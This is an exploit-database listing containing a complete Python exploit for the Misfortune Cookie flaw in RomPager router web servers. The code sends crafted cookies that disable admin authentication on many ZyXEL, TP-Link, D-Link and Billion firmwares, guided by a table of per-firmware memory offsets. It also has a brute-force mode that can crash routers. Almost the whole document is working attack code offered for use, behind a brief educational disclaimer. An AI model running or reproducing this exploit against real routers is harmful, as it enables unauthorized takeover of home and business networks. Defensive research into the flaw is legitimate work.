Multiple Vendors (RomPager <= 4.34) - Misfortune Cookie Router Authentication Bypass



EKU-ID: 5519 CVE: 2015-9222 OSVDB-ID:
Author: Milad Doorbash Published: 2016-04-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Title: Misfortune Cookie Exploit (RomPager <= 4.34) router authentication remover
# Date: 17/4/2016
# CVE: CVE-2015-9222 (http://mis.fortunecook.ie)
# Vendors: ZyXEL,TP-Link,D-Link,Nilox,Billion,ZTE,AirLive,...
# Vulnerable models: http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf
# Versions affected: RomPager <= 4.34 (specifically 4.07)
# Tested on : firmwares which are set as tested in the targets list
# Category: Remote Exploit
# Usage: ./exploit.py url
#   Example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040
 
# Author: Milad Doorbash
# Email: milad.doorbash@gmail.com
# Social: @doorbash
# Blog: http://doorbash.ir
 
# Many Thanks to :
#   Cawan Chui (http://embedsec.systems/embedded-device-security/2015/02/16/Misfortune-Cookie-CVE-2014-9222-Demystified.html)
#   Piotr Bania (http://piotrbania.com/all/articles/tplink_patch)
#   Grant Willcox (https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2015/10/porting-the-misfortune-cookie-exploit-whitepaperpdf)
#   Chan (http://scz.617.cn/misc/201504141114.txt -- http://www.nsfocus.com.cn/upload/contents/2015/09/2015_09181715274142.pdf)
 
# Disclaimer :
#   This exploit is for testing and educational purposes only.Any other usage for this code is not allowed.
#   Author takes no responsibility for any actions with provided informations or codes.
 
# Description :
#   Misfortune Cookie is a critical vulnerability that allows an intruder to remotely
#   take over an Internet router and use it to attack home and business networks.With a few magic
#   cookies added to your request you bypass any authentication and browse the configuration
#   interface as admin, from any open port.
 
import requests
import sys
import time
 
MODE_TEST = 100000
MODE_BRUTE_FORCE = 100001
 
if len(sys.argv) == 1:
    print "usage: python " + sys.argv[0] + " url [enable]"
    print "example: python exploit.py http://192.168.1.1 , python exploit.py https://192.168.1.1:3040"
    exit()
 
url = str(sys.argv[1])
auth_byte = '\x00'
s = requests.Session()
 
if len(sys.argv) == 3:
    if str(sys.argv[2]) == 'enable':
        auth_byte = '\x01' # enable authenticaion again
    else:
        print "usage: python " + sys.argv[0] + " url [enable]"
        exit()
 
targets = [
 
    ["Azmoon    AZ-D140W        2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1",107367693,13], # 0x803D5A79       # tested
    ["Billion   BiPAC 5102S     Av2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d                       # ----------
    ["Billion   BiPAC 5102S     Bv2.7.0.23 (UE0.B1C)",107369694,13], # 0x8032204d                       # ----------
    ["Billion   BiPAC 5200      2.11.84.0(UE2.C2)3.11.11.6",107369545,9], # 0x803ec2ad                  # ----------
    ["Billion   BiPAC 5200      2_11_62_2_ UE0.C2D_3_10_16_0",107371218,21], # 0x803c53e5               # ----------
    ["Billion   BiPAC 5200A     2_10_5 _0(RE0.C2)3_6_0_0",107366366,25], # 0x8038a6e1                   # ----------
    ["Billion   BiPAC 5200A     2_11_38_0 (RE0.C29)3_10_5_0",107371453,9], # 0x803b3a51                 # ----------
    ["Billion   BiPAC 5200GR4       2.11.91.0(RE2.C29)3.11.11.52",107367690,21], # 0x803D8A51           # tested
    ["Billion   BiPAC 5200S     2.10.5.0 (UE0.C2C) 3.6.0.0",107368270,1], # 0x8034b109                  # ----------
    ["Billion   BiPAC 5200SRD       2.12.17.0_UE2.C3_3.12.17.0",107371378,37], # 0x8040587d             # ----------
    ["Billion   BiPAC 5200SRD       2_11_62_2(UE0.C3D)3_11_11_22",107371218,13], # 0x803c49d5           # ----------
    ["D-Link    DSL-2520U   Z1  1.08 DSL-2520U_RT63261_Middle_East_ADSL",107368902,25], # 0x803fea01    # tested
    ["D-Link    DSL-2600U   Z1  DSL-2600U HWZ1",107366496,13], # 0x8040637d                             # ----------
    ["D-Link    DSL-2600U   Z2  V1.08_ras",107360133,20], # 0x803389B0                                  # ----------
    ["TP-Link   TD-8616     V2  TD-8616_v2_080513",107371483,21], # 0x80397055                          # ----------
    ["TP-Link   TD-8816     V4  TD-8816_100528_Russia",107369790,17], # 0x803ae0b1                      # ----------
    ["TP-Link   TD-8816     V4  TD-8816_V4_100524",107369790,17], # 0x803ae0b1                          # ----------
    ["TP-Link   TD-8816     V5  TD-8816_100528_Russia",107369790,17], # 0x803ae0b1                      # ----------
    ["TP-Link   TD-8816     V5  TD-8816_V5_100524",107369790,17], # 0x803ae0b1                          # tested
    ["TP-Link   TD-8816     V5  TD-8816_V5_100903",107369790,17], # 0x803ae0b1                          # ----------
    ["TP-Link   TD-8816     V6  TD-8816_V6_100907",107371426,17], # 0x803c6e09                          # ----------
    ["TP-Link   TD-8816     V7  TD-8816_V7_111103",107371161,1], # 0x803e1bd5                           # ----------
    ["TP-Link   TD-8816     V7  TD-8816_V7_130204",107370211,5], # 0x80400c85                           # ----------
    ["TP-Link   TD-8817     V5  TD-8817_V5_100524",107369790,17], # 0x803ae0b1                          # ----------
    ["TP-Link   TD-8817     V5  TD-8817_V5_100702_TR",107369790,17], # 0x803ae0b1                       # ----------
    ["TP-Link   TD-8817     V5  TD-8817_V5_100903",107369790,17], # 0x803ae0b1                          # ----------
    ["TP-Link   TD-8817     V6  TD-8817_V6_100907",107369788,1], # 0x803b6e09                           # ----------
    ["TP-Link   TD-8817     V6  TD-8817_V6_101221",107369788,1], # 0x803b6e09                           # ----------
    ["TP-Link   TD-8817     V7  TD-8817_V7_110826",107369522,25], # 0x803d1bd5                          # ----------
    ["TP-Link   TD-8817     V7  TD-8817_V7_130217",107369316,21], # 0x80407625                          # ----------
    ["TP-Link   TD-8817     V7  TD-8817_v7_120509",107369321,9], # 0x803fbcc5                           # tested
    ["TP-Link   TD-8817     V8  TD-8817_V8_140311",107351277,20], # 0x8024E148                          # Grant Willcox
    ["TP-Link   TD-8820     V3  TD-8820_V3_091223",107369768,17], # 0x80397E69                          # Chan
    ["TP-Link   TD-8840T    V1  TD-8840T_080520",107369845,5], # 0x80387055                             # ----------
    ["TP-Link   TD-8840T    V2  TD-8840T_V2_100525",107369790,17], # 0x803ae0b1                         # tested
    ["TP-Link   TD-8840T    V2  TD-8840T_V2_100702_TR",107369790,17], # 0x803ae0b1                      # ----------
    ["TP-Link   TD-8840T    V2  TD-8840T_v2_090609",107369570,1], # 0x803c65d5                          # ----------
    ["TP-Link   TD-8840T    V3  TD-8840T_V3_101208",107369766,17], #0x803c3e89                          # tested   
    ["TP-Link   TD-8840T    V3  TD-8840T_V3_110221",107369764,5], # 0x803d1a09                          # ----------
    ["TP-Link   TD-8840T    V3  TD-8840T_V3_120531",107369688,17], # 0x803fed35                         # ----------
    ["TP-Link   TD-W8101G   V1  TD-W8101G_090107",107367772,37], # 0x803bf701                           # ----------
    ["TP-Link   TD-W8101G   V1  TD-W8101G_090107",107367808,21], # 0x803e5b6d                           # ----------
    ["TP-Link   TD-W8101G   V2  TD-W8101G_V2_100819",107367751,21], # 0x803dc701                        # ----------
    ["TP-Link   TD-W8101G   V2  TD-W8101G_V2_101015_TR",107367749,13], # 0x803e1829                     # ----------
    ["TP-Link   TD-W8101G   V2  TD-W8101G_V2_101101",107367749,13], # 0x803e1829                        # ----------
    ["TP-Link   TD-W8101G   V3  TD-W8101G_V3_110119",107367765,25], # 0x804bb941                        # ----------
    ["TP-Link   TD-W8101G   V3  TD-W8101G_V3_120213",107367052,25], # 0x804e1ff9                        # ----------
    ["TP-Link   TD-W8101G   V3  TD-W8101G_V3_120604",107365835,1], # 0x804f16a9                         # ----------
    ["TP-Link   TD-W8151N   V3  TD-W8151N_V3_120530",107353867,24], # 0x8034F3A4                        # tested
    ["TP-Link   TD-W8901G   V1  TD-W8901G_080522",107367787,21], # 0x803AB30D                           # Piotr Bania
    ["TP-Link   TD-W8901G   V1,2    TD-W8901G_080522",107368013,5], # 0x803AB30D                        # ----------
    ["TP-Link   TD-W8901G   V2  TD-W8901G_090113_Turkish",107368013,5], # 0x803AB30D                    # ----------
    ["TP-Link   TD-W8901G   V3  TD-W8901G(UK)_V3_140512",107367854,9], # 0x803cf335                     # tested
    ["TP-Link   TD-W8901G   V3  TD-W8901G_V3_100603",107367751,21], # 0x803DC701                        # chan
    ["TP-Link   TD-W8901G   V3  TD-W8901G_V3_100702_TR",107367751,21], # 0x803DC701                     # tested
    ["TP-Link   TD-W8901G   V3  TD-W8901G_V3_100901",107367749,13], # 0x803E1829                        # tested
    ["TP-Link   TD-W8901G   V6  TD-W8901G_V6_110119",107367765,25], # 0x804BB941                        # Chan
    ["TP-Link   TD-W8901G   V6  TD-W8901G_V6_110915",107367682,21], # 0x804D7CB9                        # Chan
    ["TP-Link   TD-W8901G   V6  TD-W8901G_V6_120418",107365835,1], # 0x804F16A9                         # ----------
    ["TP-Link   TD-W8901G   V6  TD-W8901G_V6_120213",107367052,25], # 0x804E1FF9                        # ----------
    ["TP-Link   TD-W8901GB  V3  TD-W8901GB_V3_100727",107367756,13], # 0x803dfbe9                       # ----------
    ["TP-Link   TD-W8901GB  V3  TD-W8901GB_V3_100820",107369393,21], # 0x803f1719                       # ----------
    ["TP-Link   TD-W8901N   V1  TD-W8901N v1_111211",107353880,0],  # 0x8034FF94                        # cawan Chui
    ["TP-Link   TD-W8951ND  V1  TD-TD-W8951ND_V1_101124,100723,100728",107369839,25], # 0x803d2d61      # tested
    ["TP-Link   TD-W8951ND  V1  TD-TD-W8951ND_V1_110907",107369876,13], # 0x803d6ef9                    # ----------
    ["TP-Link   TD-W8951ND  V1  TD-W8951ND_V1_111125",107369876,13], # 0x803d6ef9                       # ----------
    ["TP-Link   TD-W8951ND  V3  TD-W8951ND_V3.0_110729_FI",107366743,21], # 0x804ef189                  # ----------
    ["TP-Link   TD-W8951ND  V3  TD-W8951ND_V3_110721",107366743,21], # 0x804ee049                       # ----------
    ["TP-Link   TD-W8951ND  V3  TD-W8951ND_V3_20110729_FI",107366743,21], # 0x804ef189                  # ----------
    ["TP-Link   TD-W8951ND  V4  TD-W8951ND_V4_120511",107364759,25],  # 0x80523979                      # tested
    ["TP-Link   TD-W8951ND  V4  TD-W8951ND_V4_120607",107364759,13], # 0x80524A91                       # tested
    ["TP-Link   TD-W8951ND  V4  TD-W8951ND_v4_120912_FL",107364760,21], # 0x80523859                    # tested
    ["TP-Link   TD-W8961NB  V1  TD-W8961NB_V1_110107",107369844,17], # 0x803de3f1                       # tested
    ["TP-Link   TD-W8961NB  V1  TD-W8961NB_V1_110519",107369844,17], # 0x803de3f1                       # ----------
    ["TP-Link   TD-W8961NB  V2  TD-W8961NB_V2_120319",107367629,21], # 0x80531859                       # ----------
    ["TP-Link   TD-W8961NB  V2  TD-W8961NB_V2_120823",107366421,13], # 0x80542e59                       # ----------
    ["TP-Link   TD-W8961ND  V1  TD-W8961ND_V1_100722,101122",107369839,25], # 0x803D2D61                # tested
    ["TP-Link   TD-W8961ND  V1  TD-W8961ND_V1_101022_TR",107369839,25], # 0x803D2D61                    # ----------
    ["TP-Link   TD-W8961ND  V1  TD-W8961ND_V1_111125",107369876,13], # 0x803D6EF9                       # ----------
    ["TP-Link   TD-W8961ND  V2  TD-W8961ND_V2_120427",107364732,25], # 0x8052e0e9                       # ----------
    ["TP-Link   TD-W8961ND  V2  TD-W8961ND_V2_120710_UK",107364771,37], # 0x80523AA9                    # ----------
    ["TP-Link   TD-W8961ND  V2  TD-W8961ND_V2_120723_FI",107364762,29], # 0x8052B6B1                    # ----------
    ["TP-Link   TD-W8961ND  V3  TD-W8961ND_V3_120524,120808",107353880,0], # 0x803605B4                 # ----------
    ["TP-Link   TD-W8961ND  V3  TD-W8961ND_V3_120830",107353414,36], # 0x803605B4                       # ----------
    ["ZyXEL P-660R-T3   V3  3.40(BOQ.0)C0",107369567,21], # 0x803db071                                  # tested
    ["ZyXEL P-660RU-T3  V3  3.40(BJR.0)C0",107369567,21], # 0x803db071                                  # ----------
     
 
# *---------- means data for this firmware is obtained from other tested firmwares.
# if you tested on your devices report to me so i can change them to tested state.
# don't forget to mention your device model and full firmware version in your reports.
# I could not gather information for every vulnerable firmwares since some vendors has removed
# vulnerable/old ones from their websites or add some unknown-yet security mechanisms to the them.
# if you want to add missing firmwares data to list you can do it by reading blog posts
# mentioned in "Many thanks to" part at the beginning.Btw please don't hesitate to contact me
# for any question or further information.
 
]
 
def request(num,n,data):
    try:
        print "\nConnecting to: " + url + "\n"
        s.headers.update({"Cookie":"C" + str(num) + "=" + "B"* n + data + ";"})
        r = s.get(url)
        print str(r.status_code) + "\n"
        for i in r.headers:
            print i + ": " + r.headers[i]
        return [r.status_code,r.text]
    except Exception, e:
        return 1000
 
 
def printMenu():
    print """
         __  __ _      __            _                   
        |  \/  (_)___ / _| ___  _ __| |_ _   _ _ __   ___
        | |\/| | / __| |_ / _ \| '__| __| | | | '_ \ / _ \         
        | |  | | \__ \  _| (_) | |  | |_| |_| | | | |  __/             
        |_|  |_|_|___/_|  \___/|_|   \__|\__,_|_| |_|\___|         
                                                           
   ____            _    _        _____            _       _ _  
  / ___|___   ___ | | _(_) ___  | ____|_  ___ __ | | ___ (_) |_
 | |   / _ \ / _ \| |/ / |/ _ \ |  _| \ \/ / '_ \| |/ _ \| | __|
 | |__| (_) | (_) |   <| |  __/ | |___ >  <| |_) | | (_) | | |_
  \____\___/ \___/|_|\_\_|\___| |_____/_/\_\ .__/|_|\___/|_|\__|
                                           |_|                
 
----------------------------------------------------------------------------
"""
    for k,i in enumerate(targets):
        print str(k+1) + "- " + i[0]
 
    print """
0- Not sure just try them all! (may cause reboot)
T- Test misfortune cookie vulnerablity against target
B- BruteForce to find auth-remover cookie (may cause reboot)
"""
    c = 0
    while True:
        selection = raw_input("select a target: ")
        if selection == "T":
            return MODE_TEST
        elif selection == "B":
            return MODE_BRUTE_FORCE
        c = int(selection)
        if c <= len(targets):
            break
        else:
            print "bad input try again"
    return c - 1
 
def bruteforce():
    for i in range(107364000,107380000):
        for j in range(0,40):
            print "testing " + str(i) + " , " + str(j)
            result = request(i,j,"\x00")[0]
            if result <= 302:
                print "YEAHHH!!!!"
                print str(i) + " , " + str(j) + " is the answer!"
                return
            elif result == 1000:
                time.sleep(60)
 
def exploit():
    c = printMenu()
    if c < 0:
        for k,i in enumerate(targets):
            print "testing #" + str(k+1) + " ..."
            result = request(i[1],i[2],auth_byte)[0]
            if result == 1000:
                print "\n[!] Error. maybe router crashed by sending wrong cookie or it's your connection problem.waiting 60 seconds for router to reboot"
                time.sleep(60)
            elif result <= 302:
                print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."
                break # some routers always return 200 (for custom login page). so maybe we should comment this line
            else:
                print "\n[!] Failed."
    else:
        if c == MODE_TEST:
            if "HelloWorld" in request(107373883,0,"/HelloWorld")[1]:
                print "\n[!] Target is vulnerable"
            else:
                print "\n[!] Target is not vulnerable"
        elif c == MODE_BRUTE_FORCE:
            bruteforce()
        elif request(targets[c][1],targets[c][2],auth_byte)[0] > 302:
            print "\n[!] Failed."
        else:
            print "\n[!] Seems good but check " + url + " using your browser to verify if authentication is disabled or not."
 
exploit()